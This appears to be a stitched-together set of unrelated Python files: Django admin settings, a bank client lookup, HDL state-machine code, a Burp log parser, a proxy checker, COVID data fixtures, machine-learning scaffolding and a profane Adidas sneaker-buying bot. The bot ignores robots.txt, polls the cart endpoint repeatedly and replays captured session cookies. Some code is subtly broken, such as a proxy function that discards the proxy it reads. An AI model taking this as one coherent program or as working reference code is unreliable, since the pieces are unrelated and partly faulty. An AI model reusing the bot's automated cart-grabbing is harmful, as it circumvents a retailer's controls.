list_filter = ('status',)
inlines = [
ClubLeaderInline,
ClubManagerInline,
ContactInline,
]
|
import time
import ini_files.ini as ini
import main_page.xml_requests.xml_operations as my_xml
import logging
from xml.etree import ElementTree as et
from main_page.client import Client
from db_operations.db_requests import get_user_fp_code_from_idn as get_fp_code
from prettytable import PrettyTable
LOG_FORMAT = "%(asctime)s [%(levelname)s]\t [%(name)s]\t %(message)s"
logging.basicConfig(filename="logs/request.log", format=LOG_FORMAT, datefmt='%H:%M:%S', filemode="w", level=logging.INFO)
log = logging.getLogger("coy_operation")
XML_FILE = 'xml_requests/COY_find_info.xml'
PATH_INI = "connections.ini"
def __create_xml_coy():
""" перезапись xml с новым кодом клента """
current_time = time.strftime('%Y%m%d%H%M%S')
user = Client()
idn = user.set_idn()
fp_code = get_fp_code(idn)
try:
tree = et.parse(XML_FILE)
tree.find('.//TerminalTime').text = current_time
tree.find('.//BankId').text = fp_code
tree.write('xml_requests\COY_find_info.xml')
except FileNotFoundError:
log.exception(FileNotFoundError)
pass
def __get_url_coy():
"""
Получение url СОУ для отправки запроса
:return: url
"""
url = ""
try:
parameters = ini.get_config_parameters(PATH_INI, 'COY')
server = parameters[1]
port = parameters[2]
sid = parameters[3]
url = 'http://' + server + ':' + port + sid
log.info("Сформировали url для отправки запроса")
except:
log.exception("Формирование url. Не смогли считать параметры")
pass
return url
def send_coy_request():
""" создание соединения, отправка запроса и вывод результата ответа """
__create_xml_coy()
url = __get_url_coy()
xml = my_xml.xml_read(XML_FILE)
response = my_xml.xml_request_coy(url, xml)
print(response)
# user_parameters = parse_response_coy(response)
# user_table = PrettyTable()
# column_names = ["Параметр", "Значение"]
# user_table.add_column(column_names[0], ["Id", "FIO", "Address", "Phone", "Email", "DateOfBirth", "Sex", "BankId",
# "PersonalNo", "Document", "Options"])
# second_column = []
# for i in user_parameters:
# second_column.append(i)
# user_table.add_column(column_names[1], second_column)
# print(user_table)
log.info("Вывели инфу о клиенте")
return response
# def parse_response_coy(response):
# """
# вывод ответа из СОУ в читаемый вид
# :param response: xml
# :return: преобразованная инфа из СОУ
# """
# xml = et.fromstring(response)
# Id = xml.find('.//Id').text
# FIO = xml.find('.//FIO').text
# Address = xml.find('.//Address').text
# Phone = xml.find('.//Phone').text
# try:
# Email = xml.find('.//Email').text
# except:
# Email = "no email"
# DateOfBirth = xml.find('.//DateOfBirth').text
# Sex = xml.find('.//Sex').text
# BankId = xml.find('.//BankId').text
# PersonalNo = xml.find('.//PersonalNo').text
# Document = xml.find('.//Document').text
# try:
# Options = xml.find('.//Options').text
# except:
# Options = "no options"
#
# user = [Id, FIO, Address, Phone, Email, DateOfBirth, Sex, BankId, PersonalNo, Document, Options]
# log.info("Преобразовали ответ из СОУ в нормальный вид")
# return user
|
# 通过yield实现
def fib(n):
i = 1
before,after = 0,1
while i<= n:
before,after=after,before+after
yield after
i +=1
# print(type(fib(8)))
# for i in fib(8):
# print(i)
# g = fib(8)
# print(next(g))
# print(next(g))
# print(next(g))
# print(next(g))
|
from rv.modules import Behavior as B
from rv.modules import Module
from rv.modules.base.ctl2note import BaseCtl2Note
class Ctl2Note(BaseCtl2Note, Module):
behaviors = {
B.sends_notes,
}
|
import torch
import numpy as np
import math
data1 = np.array([
[21966000, 0, 0, 0, 0, 0, 0, 0],
[23447000, 0, 0, 0, 0, 0, 0, 0],
[20154000, 0, 0, 0, 0, 0, 0, 0]])
data2 = np.array([
[0, 8, 8, 4, 2, 4, 2, 7],
[0, 0, 2, 2, 1, 1, 3, 6],
[0, 5, 2, 1, 4, 6, 1, 8]])
data3 = data1 + data2
i = 0
data4 = []
while i < 3:
data = data3[i][0] + data3[i][1] * 100 + data3[i][2] * 10 + data3[i][3] + data3[i][4] * 0.1 + data3[i][5] * 0.01 + \
data3[i][6] * 0.001 + data3[i][7] * 0.0001
data4.append(round(data, 4))
i = i + 1
print(data4)
|
from django.shortcuts import render, reverse
from django.views import generic
from .forms import AMSModelForm
from .models import AMS
from users.mixins import SuperuserAndLoginRequiredMixin, ModeratorAndLoginRequiredMixin, GuestMixin
class AMSListView(SuperuserAndLoginRequiredMixin, generic.ListView):
template_name = "ams/ams_list.html"
queryset = AMS.objects.all()
context_object_name = "ams_objects"
class AMSDetailView(generic.DetailView):
template_name = "ams/ams_detail.html"
queryset = AMS.objects.all()
context_object_name = "ams"
class AMSCreateView(SuperuserAndLoginRequiredMixin, generic.CreateView):
template_name = "ams/ams_create.html"
form_class = AMSModelForm
def get_success_url(self):
return reverse("ams:ams-list")
class AMSUpdateView(SuperuserAndLoginRequiredMixin, generic.UpdateView):
template_name = "ams/ams_update.html"
queryset = AMS.objects.all()
form_class = AMSModelForm
def get_success_url(self):
return reverse("ams:ams-list")
class AMSDeleteView(SuperuserAndLoginRequiredMixin, GuestMixin, generic.DeleteView):
template_name = "ams/ams_delete.html"
queryset = AMS.objects.all()
def get_success_url(self):
return reverse("ams:ams-list")
|
#coding:utf-8
# 读取XML文件
import os
import xml.etree.ElementTree as ET
# from xml.etree.ElementTree import parse, Element
def get_xml_info(path):
filenames = os.listdir(path)
fnames = []
all_boxes = []
for filename in filenames:
# if filename[-5] == '6' and filename[-3:] == 'xml':
if filename[-3:] == 'xml':
tree = ET.parse(os.path.join(path,filename))
root = tree.getroot()
fname = root.find('filename').text
# print("fname: ", fname)
fnames.append(fname)
boxes = []
for ob in root.iter('object'):
for bndbox in ob.iter('bndbox'):
box = []
for l in bndbox:
box.append(int(l.text))
boxes.append(box)
all_boxes.append(boxes)
return fnames, all_boxes
if __name__ == '__main__':
print('???')
#####################################################################
import json
def get_json(filename):
with open(filename, 'r') as load_f:
load_dict = json.load(load_f)
print(load_dict)
print(len(load_dict))
print(load_dict[3][2])
# load_dict['smallberg'] = [8200, {1: [['Python', 81], ['shirt', 300]]}]
# print(load_dict)
json.dumps(load_dict, sort_keys=True)
def findfile():
files = os.listdir('.')
for file in files:
if file[-5:] == '.json':
print(file)
get_json(file)
#####################################################################
import csv
with open('run_nomix_cifar100_mute_with_xavier_logs-tag-Test_1001_val_acc.csv') as f:
f_csv = csv.reader(f)
headers = next(f_csv)
# print(headers)
for row in f_csv:
print(row)
# if __name__ == '__main__':
# findfile() |
# function to read cog files
# Marcos van Dam
# Modified March 2005 to use lun, rather than a fixed value
# Modified Sept 2006 for the NGWFC
# To python 3.0 Elena Manjavacas April 2020
import numpy as np
import os.path
import matplotlib.pyplot as plt
def readcog(filename):
offsets = np.zeros(608)
cdcog='/local/kroot/rel/ao/qfix/data/ControlParms/CentOrigin/'
tmp0 = filename
tmp = os.path.isfile(tmp0)
print('File found? =',tmp)
if tmp == False:
tmp0 = cdcog+filename
tmp = os.path.isfile(tmp0)
print('File found in path '+cdcog+'? = ' ,tmp)
if tmp == False:
print('File '+filename+' not found, returning')
else:
fname = tmp0
offsets = np.fromfile(fname, dtype='f', offset=1)
np.savetxt('new_'+fname, offsets)
print('File written in path '+ cdcog)
return offsets
else:
fname = tmp0
offsets = np.fromfile(fname, dtype='f', offset=1)
plt.plot(offsets)
np.savetxt('new_'+fname, offsets)
print('File '+ filename +' written')
return offsets
|
from pyspark.sql import SparkSession
from pyspark.sql.types import *
from mine import killer
def main():
"""
Fill in this function.
1. Write a function in a separate file that will be used in a DataFrame map operation.
2. Create a dataframe with words.
3. Use function for map operation.
NOTE: Use Lambdas over new functions.
NOTE: Use context.read.format('parquet').load(...) to read a parquet file.
NOTE: Make sure standalone spark cluster is running.
See https://spark.apache.org/docs/latest/sql-getting-started.html for help.
See https://spark.apache.org/docs/2.1.0/api/python/pyspark.sql.html for help.
See https://spark.apache.org/docs/latest/spark-standalone.html for help.
"""
spark = SparkSession \
.builder \
.appName("words") \
.master("spark://127.0.1.1:7077") \
.getOrCreate()
# Fill in here
main()
|
import os
path = os.path
from myhdl import *
#INIT, RD_AND_JPEG_DATA, WR_DATA, INTERLACE, DONE = range(5)
ACTIVE_LOW = bool(0)
FRAME_SIZE = 8
t_State = enum('INIT', 'RD_AND_JPEG_DATA', 'WR_DATA', 'INTERLACE', 'DONE', encoding="one_hot")
def RamCtrl(SOF, state, WR_DATAFlag, clk_fast, reset_n, addrsam_r, addrjpeg_r, rd_r, wr_r):
""" Framing control FSM.
SOF -- start-of-frame output bit
state -- RamState output
WR_DATAFlag -- WR_DATA pattern found indication input
clk_fast -- clock input
reset_n -- active low reset
"""
index = Signal(intbv(0)[8:]) # position in frame
@always(clk_fast.posedge, reset_n.negedge)
def FSM():
if reset_n == ACTIVE_LOW:
SOF.next = 0
index.next = 0
addrsam_r.next = 1
addrjpeg_r.next = 8192 + 1
rd_r.next = 0
wr_r.next = 0
state.next = t_State.INIT
else:
index.next = (index + 1) % FRAME_SIZE
SOF.next = 0
if state == t_State.INIT:
addrsam_r.next = 1
addrjpeg_r.next = 8192 + 1
rd_r.next = 0
wr_r.next = 0
state.next = t_State.RD_AND_JPEG_DATA
elif state == t_State.RD_AND_JPEG_DATA:
rd_r.next = 1
if (addrsam_r <= 21):
addrsam_r.next = addrsam_r + 2
else:
addrsam_r.next = 1
state.next = t_State.WR_DATA
elif state == t_State.WR_DATA:
rd_r.next = 0
wr_r.next = 1
SOF.next = 1
if addrjpeg_r <= (8192 + 21):
addrjpeg_r.next = addrjpeg_r + 2
else:
wr_r.next = 0
addrjpeg_r.next = (8192 + 1)
state.next = t_State.INTERLACE
elif state == t_State.INTERLACE:
if (addrsam_r <= 21):
rd_r.next = 1
addrsam_r.next = addrsam_r + 2
rd_r.next = 0
wr_r.next = 1
addrjpeg_r.next = addrjpeg_r + 2
wr_r.next = 0
else:
addrsam_r.next = 1
addrjpeg_r.next = (8192 + 1)
state.next = t_State.INIT
elif state == t_State.DONE:
SOF.next = 0
else:
raise ValueError("Undefined state")
#addrjpeg_r.next <= addrjpeg_r
#addrsam_r.next <= addrsam_r
return FSM
def main():
SOF = Signal(bool(0))
WR_DATAFlag = Signal(bool(0))
clk_fast = Signal(bool(0))
reset_n = Signal(bool(1))
state = Signal(t_State.INIT)
addrsam_r = Signal(intbv(0, min = 0, max = 8388608))
addrjpeg_r = Signal(intbv(0, min = 0, max = 8388608))
rd_r = Signal(bool(0))
wr_r = Signal(bool(0))
toVerilog(RamCtrl, SOF, state, WR_DATAFlag, clk_fast, reset_n, addrsam_r, addrjpeg_r, rd_r, wr_r)
toVHDL(RamCtrl, SOF, state, WR_DATAFlag, clk_fast, reset_n, addrsam_r, addrjpeg_r, rd_r, wr_r)
if __name__ == '__main__':
main()
|
#coding: utf-8
import re
import sys
import json
import requests
try:
from collections import OrderedDict as _default_dict
except ImportError:
_default_dict = dict
class BurplogParser(object):
def __init__(self, filename, dict_type=_default_dict):
self.dict = dict_type
self.fp = open(filename)
def __del__(self):
self.close()
def close(self):
if self.fp:
self.fp.close()
self.fp = None
def next(self):
packbag = self.readlog()
if not packbag:
raise StopIteration
return packbag
def readlog(self):
assert(self.fp is not None)
flag = 0
request = 0
packbag = self.dict()
while True:
line = self.fp.readline()
if not line:
break
if not line.strip():
if packbag.has_key('headers'):
flag = 1
continue
if line.find(' ') > 0:
cols = line.split()
if len(cols) >= 2:
if re.match(r'am|pm', cols[1], re.I):
cols.pop(1)
regtime = re.match(r'\d{1,2}\:\d{1,2}\:\d{1,2}', cols[0])
if regtime:
reghost = re.match(r'((http|https)\:\/\/[\w|\W]+)(\:\d{1,5})?', cols[1], re.I)
if reghost:
request = 1
hosts = reghost.group(0).split(':')
try:
packbag['host'] = hosts[0] + ':' + hosts[1]
packbag['schema'] = hosts[0]
packbag['port'] = int(hosts[2])
except Exception:
pass
if re.match(r'^[a-z].+http\/\d\.\d$', line, re.I):
cols = line.split()
packbag['headers'] = self.dict()
packbag['method'] = cols[0]
packbag['url'] = packbag['host'] + ':' + str(packbag['port']) + cols[1]
elif re.match(r'^\=+$', line):
if flag: break
else:
if packbag.has_key('headers'):
if not flag:
cols = line.split(':', 1)
if len(cols) >= 2:
packbag['headers'][cols[0]] = cols[1].rstrip()
else:
packbag['data'] = line.rstrip()
return packbag
def __iter__(self):
self.fp.seek(0)
while True:
packbag = self.readlog()
if not packbag:
return
yield packbag
if __name__ == '__main__':
burplog = BurplogParser("burplog.txt")
try:
while True:
packbag = next(burplog)
print packbag
except StopIteration:
pass
for index, package in enumerate(burplog):
print package
burplog.close()
|
import pytest
import pdb
from fhireval.test_suite.concept_map import example_code_system_source, reset_testdata
test_id = f"{'2.8.1':<10} - Create ConceptMap"
test_weight = 2
def test_codemap_create(host):
reset_testdata(host)
result = host.post('ConceptMap', example_code_system_source, validate_only=False)
assert result['status_code'] == 201
cm_id = result['response']['id']
delete_result = host.delete_by_record_id('ConceptMap', cm_id)
assert delete_result['status_code'] == 200
|
from requests import get
import requests
from requests.exceptions import ProxyError
def read_proxy(check=True):
proxy_file = open('torrents_parser/proxy.txt', 'r')
for line in proxy_file.readlines():
proxy_line = 'socks5://{}'.format(line[:len(line)])
proxies = {
'http': 'socks5://',
'https': 'socks5://'
}
requests.get('https://google.com', proxies=proxies)
if check:
try:
get('https://rutracker.org', proxies=proxies)
except ProxyError:
continue
else:
return proxies
else:
return proxies
print('NONE PROXY')
return None
|
#!/usr/bin/env python
from pathlib import Path
import pandas as pd
_PACKAGE_DIR = Path(__file__).absolute().parent # .../unit
_FIXTURES = Path.joinpath(_PACKAGE_DIR, 'fixtures') # .../unit/fixtures
_HTML = Path.joinpath(_FIXTURES, 'html') # .../unit/fixtures/html
sample_file = Path('03-30-2020.csv')
raw_cols = ['FIPS', 'Admin2', 'Province_State', 'Country_Region', 'Last_Update', 'Lat', 'Long_', 'Confirmed', 'Deaths', 'Recovered', 'Active', 'Combined_Key']
lowercased_cols = ['fips', 'admin2', 'province_state', 'country_region', 'last_update', 'lat', 'long_', 'confirmed', 'deaths', 'recovered', 'active', 'combined_key']
necessary_cols = ['fips', 'confirmed', 'deaths']
bins_cols = ['fips', 'confirmed', 'deaths', 'confirmed_bins', 'deaths_bins']
date_cols = ['fips', 'confirmed', 'deaths', 'date']
raw_data = [
[2282, 'Yakutat', 'Alaska', 'US', '3/30/20 22:52', 59.8909808, -140.3601451, 0, 0, 0, 0, 'Yakutat, Alaska, US'],
[4025, 'Yavapai', 'Arizona', 'US', '3/30/20 22:52', 34.59933926, -112.5538588, 15, 0, 0, 0, 'Yavapai, Arizona, US'],
[5149, 'Yell', 'Arkansas', 'US', '3/30/20 22:52', 35.00292371, -93.41171338, 0, 0, 0, 0, 'Yell, Arkansas, US'],
[2290, 'Yukon-Koyukuk', 'Alaska', 'US', '3/30/20 22:52', 65.50815459, -151.3907387, 0, 0, 0, 0, 'Yukon-Koyukuk, Alaska, US'],
[4027, 'Yuma', 'Arizona', 'US', '3/30/20 22:52', 32.76895712, -113.9066674, 6, 0, 0, 0, 'Yuma, Arizona, US'],
[None, None, 'Alberta', 'Canada', '3/30/20 22:58', 53.9333, -116.5765, 661, 3, 0, 0, 'Alberta, Canada'],
[60000, None, 'American Samoa', 'US', '3/30/20 22:52', -14.271, -170.132, 0, 0, 0, 0, 'American Samoa, US'],
[None, None, 'Anguilla', 'United Kingdom', '3/30/20 22:52', 18.2206, -63.0686, 2, 0, 0, 2, 'Anguilla, United Kingdom'],
[None, None, None, 'United Kingdom', '3/30/20 22:52', 55.3781, -3.436, 22141, 1408, 135, 20598, 'United Kingdom'],
[88888, 'Big Boat', 'Diamond Princess', 'US', '3/30/20 22:52', 0, 0, 49, 0, 0, 0, 'Diamond Princess, US']
]
# Precursor: raw_data
dropna_data = [
[2282, 'Yakutat', 'Alaska', 'US', '3/30/20 22:52', 59.8909808, -140.3601451, 0, 0, 0, 0, 'Yakutat, Alaska, US'],
[4025, 'Yavapai', 'Arizona', 'US', '3/30/20 22:52', 34.59933926, -112.5538588, 15, 0, 0, 0, 'Yavapai, Arizona, US'],
[5149, 'Yell', 'Arkansas', 'US', '3/30/20 22:52', 35.00292371, -93.41171338, 0, 0, 0, 0, 'Yell, Arkansas, US'],
[2290, 'Yukon-Koyukuk', 'Alaska', 'US', '3/30/20 22:52', 65.50815459, -151.3907387, 0, 0, 0, 0, 'Yukon-Koyukuk, Alaska, US'],
[4027, 'Yuma', 'Arizona', 'US', '3/30/20 22:52', 32.76895712, -113.9066674, 6, 0, 0, 0, 'Yuma, Arizona, US'],
[88888, 'Big Boat', 'Diamond Princess', 'US', '3/30/20 22:52', 0, 0, 49, 0, 0, 0, 'Diamond Princess, US']
]
# Precursor: raw_data
us_data = [
[2282.0, 'Yakutat', 'Alaska', 'US', '3/30/20 22:52', 59.8909808, -140.3601451, 0, 0, 0, 0, 'Yakutat, Alaska, US'],
[4025.0, 'Yavapai', 'Arizona', 'US', '3/30/20 22:52', 34.59933926, -112.5538588, 15, 0, 0, 0, 'Yavapai, Arizona, US'],
[5149.0, 'Yell', 'Arkansas', 'US', '3/30/20 22:52', 35.00292371, -93.41171338, 0, 0, 0, 0, 'Yell, Arkansas, US'],
[2290.0, 'Yukon-Koyukuk', 'Alaska', 'US', '3/30/20 22:52', 65.50815459, -151.3907387, 0, 0, 0, 0, 'Yukon-Koyukuk, Alaska, US'],
[4027.0, 'Yuma', 'Arizona', 'US', '3/30/20 22:52', 32.76895712, -113.9066674, 6, 0, 0, 0, 'Yuma, Arizona, US'],
[60000.0, None, 'American Samoa', 'US', '3/30/20 22:52', -14.271, -170.132, 0, 0, 0, 0, 'American Samoa, US'],
[88888.0, 'Big Boat', 'Diamond Princess', 'US', '3/30/20 22:52', 0, 0, 49, 0, 0, 0, 'Diamond Princess, US']
]
# Precursor: raw_data
neccessarycol_data = [
[2282, 0, 0],
[4025, 15, 0],
[5149, 0, 0],
[2290, 0, 0],
[4027, 6, 0],
[None, 661, 3],
[60000, 0, 0],
[None, 2, 0],
[None, 22141, 1408],
[88888, 49, 0]
]
# Precursor: raw_data
recognizedfips_data = [
[2282, 'Yakutat', 'Alaska', 'US', '3/30/20 22:52', 59.8909808, -140.3601451, 0, 0, 0, 0, 'Yakutat, Alaska, US'],
[4025, 'Yavapai', 'Arizona', 'US', '3/30/20 22:52', 34.59933926, -112.5538588, 15, 0, 0, 0, 'Yavapai, Arizona, US'],
[5149, 'Yell', 'Arkansas', 'US', '3/30/20 22:52', 35.00292371, -93.41171338, 0, 0, 0, 0, 'Yell, Arkansas, US'],
[2290, 'Yukon-Koyukuk', 'Alaska', 'US', '3/30/20 22:52', 65.50815459, -151.3907387, 0, 0, 0, 0, 'Yukon-Koyukuk, Alaska, US'],
[4027, 'Yuma', 'Arizona', 'US', '3/30/20 22:52', 32.76895712, -113.9066674, 6, 0, 0, 0, 'Yuma, Arizona, US'],
[None, None, 'Alberta', 'Canada', '3/30/20 22:58', 53.9333, -116.5765, 661, 3, 0, 0, 'Alberta, Canada'],
[None, None, 'Anguilla', 'United Kingdom', '3/30/20 22:52', 18.2206, -63.0686, 2, 0, 0, 2, 'Anguilla, United Kingdom'],
[None, None, None, 'United Kingdom', '3/30/20 22:52', 55.3781, -3.436, 22141, 1408, 135, 20598, 'United Kingdom']
]
# Precursor: raw_data
leftpaddedfips_data = [
['02282', 'Yakutat', 'Alaska', 'US', '3/30/20 22:52', 59.8909808, -140.3601451, 0, 0, 0, 0, 'Yakutat, Alaska, US'],
['04025', 'Yavapai', 'Arizona', 'US', '3/30/20 22:52', 34.59933926, -112.5538588, 15, 0, 0, 0, 'Yavapai, Arizona, US'],
['05149', 'Yell', 'Arkansas', 'US', '3/30/20 22:52', 35.00292371, -93.41171338, 0, 0, 0, 0, 'Yell, Arkansas, US'],
['02290', 'Yukon-Koyukuk', 'Alaska', 'US', '3/30/20 22:52', 65.50815459, -151.3907387, 0, 0, 0, 0, 'Yukon-Koyukuk, Alaska, US'],
['04027', 'Yuma', 'Arizona', 'US', '3/30/20 22:52', 32.76895712, -113.9066674, 6, 0, 0, 0, 'Yuma, Arizona, US'],
['88888', 'Big Boat', 'Diamond Princess', 'US', '3/30/20 22:52', 0, 0, 49, 0, 0, 0, 'Diamond Princess, US']
]
# Precursor: neccessarycol_data
logbins_data = [
[2282, 0, 0, '0', '0'],
[4025, 15, 0, '2', '0'],
[5149, 0, 0, '0', '0'],
[2290, 0, 0, '0', '0'],
[4027, 6, 0, '1', '0'],
[None, 661, 3, '3', '1'],
[60000, 0, 0, '0', '0'],
[None, 2, 0, '1', '0'],
[None, 22141, 1408, '5', '4'],
[88888, 49, 0, '2', '0']
]
# Precursor: neccessarycol_data
datecol_data = [
[2282, 0, 0, '03-30-2020'],
[4025, 15, 0, '03-30-2020'],
[5149, 0, 0, '03-30-2020'],
[2290, 0, 0, '03-30-2020'],
[4027, 6, 0, '03-30-2020'],
[None, 661, 3, '03-30-2020'],
[60000, 0, 0, '03-30-2020'],
[None, 2, 0, '03-30-2020'],
[None, 22141, 1408, '03-30-2020'],
[88888, 49, 0, '03-30-2020']
]
# Expected output DataFrames
raw_df = pd.DataFrame(raw_data, columns=raw_cols)
dropna_df = pd.DataFrame(dropna_data, columns=raw_cols)
lowercasedcols_df = pd.DataFrame(dropna_data, columns=lowercased_cols)
us_df = pd.DataFrame(us_data, columns=lowercased_cols)
neccessarycol_df = pd.DataFrame(neccessarycol_data, columns=necessary_cols)
recognizedfips_df = pd.DataFrame(recognizedfips_data, columns=lowercased_cols)
leftpaddedfips_df = pd.DataFrame(leftpaddedfips_data, columns=lowercased_cols)
logbins_df = pd.DataFrame(logbins_data, columns=bins_cols)
datecol_df = pd.DataFrame(datecol_data, columns=date_cols)
print(neccessarycol_df)
|
import mechanize
import urllib
from urllib import urlopen
import cookielib
import BeautifulSoup
import html2text
import re
import sys
import StringIO
from urllib2 import HTTPError
import os
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import requests
import pickle
# Initialize mechanize headless browser
br = mechanize.Browser()
# This is where we hold our cookies
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br._ua_handlers['_cookies'].cookiejar
# Browser options
br.set_handle_equiv(True)
br.set_handle_gzip(False)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
# Follows refresh 0 but doesn't hang on refresh > 0
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
# UA
br.addheaders = [('User-agent', 'Chrome')]
# Initialize selenium with a headless driver as well for behind the scenes magic
# Have phantomjs.exe in same directory as where this file is
myPhantomFolder = os.getcwd()
browser = webdriver.PhantomJS(executable_path=(str(myPhantomFolder)+'\\phantomjs.exe'))
# Freshen up
browser.delete_all_cookies()
print'............................................................'
print'......77777......................................77777......'
print'.....777777...............:?+++??...............777777......'
print'...7 777777...........??+++++++++++++...........,7777777,...'
print'..777777777.........+++++++++++++++++++~........,77777777 ..'
print'..7777777777?.....?++.+?++++++++++++++.++......7777777777 ..'
print'...777.: 77777...++:.+.??.++++++++++.++.++...7777777.7777...'
print'.........777777.++++++++++++++++++++:++?~++..77777..........'
print'...........777.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. 77~...........'
print'............,7.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.7.............'
print'..............:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~...............'
print'.......?+????+++??++++++++++++++++++??+++++++?++??+??.......'
print'.......??????????????????????????????????????????????.......'
print'..............:7777777 7777777777777777777777...............'
print'...............7777 +......777777......777777...............'
print'...............77777........777 ........7777................'
print'................777,........777 ........777.................'
print'.................777.......77777........77..................'
print'..................777.....7777777?....I 7...................'
print'....................7777 777...7777 777.....................'
print'......................=777777 7777777.......................'
print'.....................777...........=77.~....................'
print'..................77.777I7 77.77 I7777+77...................'
print'................777.77...7777.7777.:.,7.777.................'
print'...............7777.7 77.77~...:77.777 .77777...............'
print'........777..777777.7..7.7777.7777.77...777777..77 .........'
print'.......7777777777 ..7777....+.I:...?777..77777777777~.......'
print'......,777777777....:777777777777777777....7777777777.......'
print'.......+7777777~.....7777777777777777 ......77777777........'
print'..........777777......777777777777777......777777...........'
print'..........:77777........77777777777........777777...........'
print'............,~...............................++.............\n'
# Normal Three Digit associated with each respective size
# Not goint to throw an exception if undefined so please only use the sizes provided. KThnx.
sizeIn = raw_input("Size (8-12): ")
if (sizeIn=='8'):
threeDigit = "610"
if (sizeIn=='8.5'):
threeDigit = "620"
if (sizeIn=='9'):
threeDigit = "630"
if (sizeIn=='9.5'):
threeDigit = "640"
if (sizeIn=='10'):
threeDigit = "650"
if (sizeIn=='10.5'):
threeDigit = "660"
if (sizeIn=='11'):
threeDigit = "670"
if (sizeIn=='11.5'):
threeDigit = "680"
if (sizeIn=='12'):
threeDigit = "690"
# Self explanatory variables
# Stub out/play with url strings to see results and causality
cart_url="https://www.adidas.com/on/demandware.store/Sites-adidas-US-Site/en_US/Cart-Show"
url = "http://www.adidas.com/on/demandware.store/Sites-adidas-US-Site/en_US/Cart-MiniAddProduct?layer=Add%20To%20Bag%20overlay&pid=B35309_"+str(threeDigit)+"&Quantity=1&masterPid=B35309add-to-cart-button="
# Test Cases below
'''
url="http://www.adidas.com/on/demandware.store/Sites-adidas-US-Site/en_US/Cart-MiniAddProduct?layer=Add%20To%20Bag%20overlay&pid=B26813_650&Quantity=1&masterPid=B26813add-to-cart-button="
url="http://www.adidas.com/on/demandware.store/Sites-adidas-US-Site/en_US/Cart-MiniAddProduct?layer=Add%20To%20Bag%20overlay&pid=B35996_660&Quantity=1&masterPid=B35996add-to-cart-button="
url="http://www.adidas.com/on/demandware.store/Sites-adidas-US-Site/en_US/Cart-MiniAddProduct?layer=Add%20To%20Bag%20overlay&pid=M18838_610&Quantity=1&masterPid=M18838add-to-cart-button="
url="http://www.adidas.com/on/demandware.store/Sites-adidas-US-Site/en_US/Cart-MiniAddProduct?layer=Add%20To%20Bag%20overlay&pid=M29395_670&Quantity=1&masterPid=M29395add-to-cart-button="
'''
# Counter variable to keep track of tries
loop = 1
print "\nRunning..."
print "Target (StyleCode): " + str(url.split("add-to-cart-button=")[0].split("=")[len(url.split("add-to-cart-button=")[0].split("="))-1])
while (1==1):
try:
# Cool your jets - please don't be an asshat. Leave some delay
time.sleep(3)
# Let's get mechanize and selenium to the cart call address
# and see what's going on
br.open(str(url))
browser.get(url)
# Scrape page for anything in span tag.
# Can use the contrapositive with the <strong> tag with the null on not yet available items
regex='<span>(.+?)</span>'
pattern = re.compile(regex)
htmltext = br.open(str(url)).read()
title = re.findall(pattern,htmltext)
# Just to see what's going on - image saved in same directory as this file
browser.save_screenshot("addRequest.png")
# If page has an element of <span> tag, trigger - ATC
if len(title)>0:
# Whoop-dee-fucking doo. Congrats.
print "Try: " + str(loop) + " - ATC success! Getting cart...\n"
# Bringing to cart page for easiser load on cookies
br.open(cart_url)
# Circumvent bullshit of webbrowser not being able to handle headers
# Saving successful ATC cookies in same folder for reuse
pickle.dump(browser.get_cookies(), open("cookies.pkl","wb"))
# Changing webdriver - sewing a head onto it - chromedriver.exe
browser = webdriver.Chrome()
# Fetching that cookie file
cookies = pickle.load(open("cookies.pkl", "rb"))
# Cookies to console
print "Here, have some cookies ya bish..."
print cookies
# Domain specific cookies so now opening physical browser to cart page
browser.get(cart_url)
# Passing cookies into the header
for cookie in cookies:
browser.add_cookie(cookie)
# Refresh to see our successful cookies
browser.refresh()
# Okay Adidas
browser.refresh()
# Great, it's in your cart - instead of doing things properly and exiting/deleting the created cookie file,
# I'm just going to sit you in timeout.
time.sleep(600)
# Sorry no <span> tags in your html document
if len(title)==0:
print "Try: " + str(loop) + " - Not yet available \n"
# Increment count
loop+=1
except:
print "Try: " + str(loop) + " - IDEK WHAT YOUR DOING BRUH. \n"
loop+=1
continue
os.system("pause")
|
import os
from configparser import ConfigParser
configur = ConfigParser()
config_path = f"{os.path.dirname(os.path.abspath(__file__))}/config.ini"
configur.read(config_path)
def get_config(config_key):
return configur.get(os.getenv("ENV","dev"),config_key) |
import os, gc, time, datetime, argparse
import numpy as np
import pandas as pd
import tensorflow as tf
from tensorflow import keras
from models.rnn_models import naive_RNNs, LSTMs, GRUs
from models.fcn import FCN
from models.lstm_fcn import LSTM_FCN, ALSTM_FCN
from models.lstnet import LSTNet
from models.resnet import ResNet
from models.tcn import TCN
from models.transformer import Transformer
# from models.mtnet import MTNet
# from models.darnn import DARNN
# from models.nbeat import NbeatsNet
from net_init_utils import NetInit
from mtsc_data_utils import ReadData
from eval_metrics import Accuracy_Score, Precision_Score, Recall_Score, Auc_Score, F1_Score
# os.environ["CUDA_VISIBLE_DEVICES"] = "2"
# gpus = tf.config.experimental.list_physical_devices(device_type='GPU')
# tf.config.experimental.set_virtual_device_configuration(gpus[0], \
# [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=2048)])
tf.random.set_seed(2021)
keras.backend.clear_session()
Data_Config = {
'ArabicDigits': 10,
'AUSLAN': 95,
'CharacterTrajectories': 20,
'CMUsubject16': 2,
'DigitShapes': 4,
'ECG': 2,
'JapaneseVowels': 9,
'KickvsPunch': 2,
'LIBRAS': 15,
'NetFlow': 2,
'PEMS': 7,
'PenDigits': 10,
'RobotFailureLP1': 4,
'RobotFailureLP2': 5,
'RobotFailureLP3': 4,
'RobotFailureLP4': 3,
'RobotFailureLP5': 5,
'Shapes': 3,
'UWave': 8,
'Wafer': 2,
'WalkvsRun': 2
}
Model = {
'naive_RNN': naive_RNNs,
'LSTM': LSTMs,
'GRU': GRUs,
'FCN': FCN,
'LSTM_FCN': LSTM_FCN,
'ALSTM_FCN': ALSTM_FCN,
'ResNet': ResNet,
'TCN': TCN,
'LSTNet': LSTNet,
'Transformer': Transformer
}
parser = argparse.ArgumentParser('Multivariate time series forecasting')
parser.add_argument('--optim', type=str, default='Adam', help='optional: SGD, RMSprop, and Adam')
parser.add_argument('--learning_rate', type=float, default=0.001, help='optimizer learning rate')
